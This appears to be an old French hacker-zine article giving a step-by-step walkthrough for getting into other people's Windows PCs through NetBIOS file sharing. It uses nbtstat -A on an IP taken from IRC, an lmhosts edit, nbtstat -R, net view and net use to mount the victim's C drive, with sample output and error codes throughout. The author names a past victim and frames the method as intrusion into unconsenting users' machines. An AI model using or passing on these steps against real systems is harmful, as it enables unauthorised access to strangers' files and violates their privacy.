La faille NBTSTAT

Ah comment ne pas parler de Nbtstat (reserve aux possesseurs de Windows) Tout hacker qui debute se doit de la connaitre . Personnellement , ce fut la premiere chose que j'ai appris et avec laquelle j'ai reussi mon premier 'hack'(si on peut dire ainsi) . Je remercie donc CABINA6 (un espagnol) qui fut ma premiere victime . Je sais que cette technique se trouve partout , mais j'estime qu'elle doit tout de meme paraitre dans le premier zine .

Voici une facon de hacker un PC sous Windows sans avoir recours a un programme special (par exemple trojan) et sans pour autant modifier son systeme . Cela necessite juste quelques commandes MSDOS . Ne vous affolez pas pour ceux qui n'ont jamais touche a DOS (or il y en a beaucoup parmi vous) , c'est assez simple .

Avec cet 'exploit' vous aurez la possibilite de vous connecter sur une machine qui fait tourner Windows (3.11, 95, 98 ou encore NT) ainsi que le client pour reseaux Microsoft avec le partage de fichiers et d'imprimantes active . Cela ne fonctionne donc pas avec toutes les machines. Etant donne que la plus grande majorite des gens ont Windows , vous trouverez pas mal de victimes potentielles . Cependant si vous voulez vous entrainer , vous pouvez le faire en loop-back (127.0.0.1) , c'est-a-dire sur vous-meme ou alors avec votre adresse IP (taper WINIPCFG dans la commande executer et pour NT tapez IPCONFIG dans la session dos).

Voici les conditions requises pour que cela fonctionne correctement , la victime doit avoir imperativement les elements suivants dans sa configuration reseau .

Client pour reseau Microsoft

Netbeui

Partage des fichiers et d'imprimantes (actives bien sur)<

Le protocole TCP/IP

Carte d'acces distant

Bien evidemment , ces elements doivent faire partie de votre configuration reseau (sauf le partage des fichiers et d'imprimantes qui peut rester inactive) . Pour ceux qui se connectent par acces reseau a distance , dans l'onglet type de serveur des proprietes du reseau trois options doivent absolument etre cochees en plus de celles que vous utilisez :

se connecter a un reseau

activer la compression logicielle

netbeui

Normalement , l'icone 'voisinage reseau' doit figurer sur votre bureau .

Passons a l'action . Premierement il faut recuperer l'IP de la victime et une fois obtenue , allez en commande MSDOS et taper :
nbtstat -A adresse_IP

Le A majuscule est tres important , si vous negligez ce detail , laissez tomber tout de suite (taper nbtstat -h pour plus d'infos). Normalement le resultat obtenu doit ressembler a ca :

-------------------Session DOS ------------------------

C:\WINDOWS\nbtstat -A addresse_ip

NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- Amadeorus <00> UNIQUE Registered IMMORTAL <00> GROUP Registered Amadeorus <03> UNIQUE Registered Amadeorus <20> UNIQUE Registered IMMORTAL <1E> GROUP Registered MAC Address = xx-xx-xx-xx-00-00 C:\WINDOWS>_
-------------------------------------------------------------

Ces infos ne s'afficheront que si l'ordinateur sur lequel vous faites le nbtstat possede la bonne configuration , a savoir : partage de fichiers et d'imprimantes actives , client pour les reseaux Microsoft , et TCP/IP .

Dans le cas contraire , vous obtenez le message d'erreur 'host not found' (ce qui va vous arriver tres souvent) . Ce qui nous interesse le plus ici , c'est le service <20> (partage de fichiers et d'imprimantes) grace auquel une connexion sur la machine distante sera possible . Les infos qui sont apparues quand la commande nbtstat a donne un resultat positif (service <20>) vont vous servir pour vous connecter sur la machine de la victime.

Editez le fichier 'lmhosts' en lui ajoutant les infos suivantes :
adresse IP , suivi d'une tabulation (tres important), le nom de l'ordinateur de la victime (mettre entre guillemets si le nom contient des espaces) , enregistrer les fichiers ainsi modifies SANS extension . (Certains mettent des directives #pre et/ou des commentaires apres le nom de l'ordinateur , perso je ne le fais pas et ca marche quand meme) .

Ensuite tapez (toujours dans la fenetre de commande ms-dos) :

--------------------------------------------------------------------------------------

C:\WINDOWS>nbtstat -R
Successful purge and preload of the NBT Remote Cache Name Table.
C:\WINDOWS>_
----------------------------------------------------------------------------------------

Si vous avez ce message c'est gagne !! Il ne reste plus qu'a cliquer sur demarrer/rechercher/ordinateur et taper le nom du service <20> et le tour est joue

En ligne de commande , il faudra taper :
C:\WINDOWS>net view \\nom_du_service_20 Shared resources at \\USERNAME Sharename Type Comment ------------------------------- A Disk B Disk C Disk D Disk E Disk Epson Printer The command was completed successfully . C:\WINDOWS>_
Cette commande vous affiche le nom des lecteurs logiques qui ont des ressources partagees ..ou que dalle si rien n'est partage . Dans le deuxieme cas, cherchez ailleurs .

Dans le premier cas , taper :
net use * \\<nom_du_service_20>\<sharename>

La commande NET USE a pour but de CREER sur votre systeme un lecteur logique reseau qui dans ce cas correspond a la ressource partagee de l'ordinateur de la victime . Allez dans poste de travail et appuyez sur F5 , vous verrez apparaitre un lecteur supplementaire portant la lettre affectee par WIN95 et contenant les fichiers de l'ordinateur sur lequel vous venez de vous connecter.

Avec DOS vous pouvez aussi avoir des messages d'erreur du genre :

Error 53: The computer name specified in the network path cannot be located.
ca veut dire que vous avez certainement foire les infos dans votre fichier LMHOSTS (ou que l'ordinateur distant s'est deconnecte entre temps)

Error 59: An unexpected network error has occurred. (Disconnected)
Vous vous etes fait griller mais a ce stade la c'est pas encore trop grave vu que vous n'avez rien fait. Il arrive aussi que des incidents se produisent lors de la connexion (problemes reseau) : reessayez.

Error 5: You do not currently have access to this file.
Il faut un mot de passe pour rentrer sur cette machine, ou alors avoir un nom d'ordinateur/nom de domaine autorise . Le password peut etre teste uniquement sous windows .

Error 86: The specified network password is not correct
Le password que vous avez tape n'est pas correct .

Rien qu'un exemple pour mieux comprendre :

Je suis sur l'IRC et j'ai envie de penetrer dans le PC d'un gars qui est evidemment sous Windows . Donc je recupere son IP qui est pour notre exemple : 193.250.225.228 .

J'ouvre alors une fenetre ms-dos et je tape :
nbstat -A 193.250.225.228

J'obtiens alors :
NetBIOS Remote Machine Name Table Name Type Status ------------------------------------ VICTIME <00> UNIQUE Registered LAMER <00> GROUP Registered VICTIME <20> UNIQUE Registered LAMER <1E> GROUP Registered MAC Address = xx-xx-xx-xx-00-00 C:\WINDOWS_
C'est gagne !!! Le nom de la ressource partagee est "VICTIME" (LAMER veut dire que c'est la seule ressource partagee sur cette IP)

J'edite mon fichier lmhosts et j'y ajoute (en respectant la syntaxe comme explique plus haut) :
193.250.225.228 VICTIME #PRE

Je sauve les fichiers sans extension bien sur . Ensuite , je tape :
nbtstat -R

En cas de resultat positif , cela donne :
Successful purge and preload of the NBT Remote Cache Name Table.

Ensuite je tape pour voir ses ressources partagées :
net view \\VICTIME

Et j'obtiens :
Ressources partagees \\VICTIME Nom de partage Type Commentaire ----------------------------------------- c Disque d Disque e Disque Execution achevee.
Je veux me connecter a son lecteur , alors je tape :
C:\WINDOWS>net use * \\VICTIME\c

Et j'obtiens en retour :
M:connecte a \\VICTIME\c

Qui m'indique que je suis a present connecter a son lecteur logique C . Je peux aussi cliquer sur demarrer / rechercher /ordinateur et taper "VICTIME" .

Ca y est , je suis connecte sur l'ordinateur de la victime : Que le carnage commence . (Je rigole) .

ATTENTION : un fichier log est cree sur la machine distante avec VOTRE ADRESSE IP . Donc pas de conneries svp !

Pour les plus grosses feignasses (a force ca devient rebarbatif) , je vous conseille de telecharger un scanner IP et un scanner de port que vous trouverez facilement sur le Web .

Amadeorus